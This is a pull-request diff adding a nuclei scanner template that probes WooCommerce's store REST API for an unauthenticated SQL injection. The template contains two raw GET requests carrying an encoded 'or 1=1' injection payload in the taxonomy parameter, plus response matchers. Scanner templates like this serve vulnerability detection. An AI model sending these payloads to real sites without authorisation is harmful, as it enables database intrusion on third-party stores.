Merge pull request #2035 from projectdiscovery/pr/2029

Unauthenticated SQL injection Woocommerce

vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml

@@ -0,0 +1,39 @@
+id: wordpress-woocommerce-sqli
+
+info:
+  name: Unauthenticated SQL injection Woocommerce
+  author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan
+  severity: critical
+  tags: wordpress,woocomernce,sqli
+  reference: |
+      - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
+      - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
+
+
+requests:
+  - raw:
+      - |
+        GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1
+        {{Hostname}}
+
+      - |
+        GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1
+        {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"term":'
+          - '"count":'
+        part: body
+        condition: and
+
+      - type: word
+        words:
+          - 'application/json'
+        part: header
+
+      - type: status
+        status:
+          - 200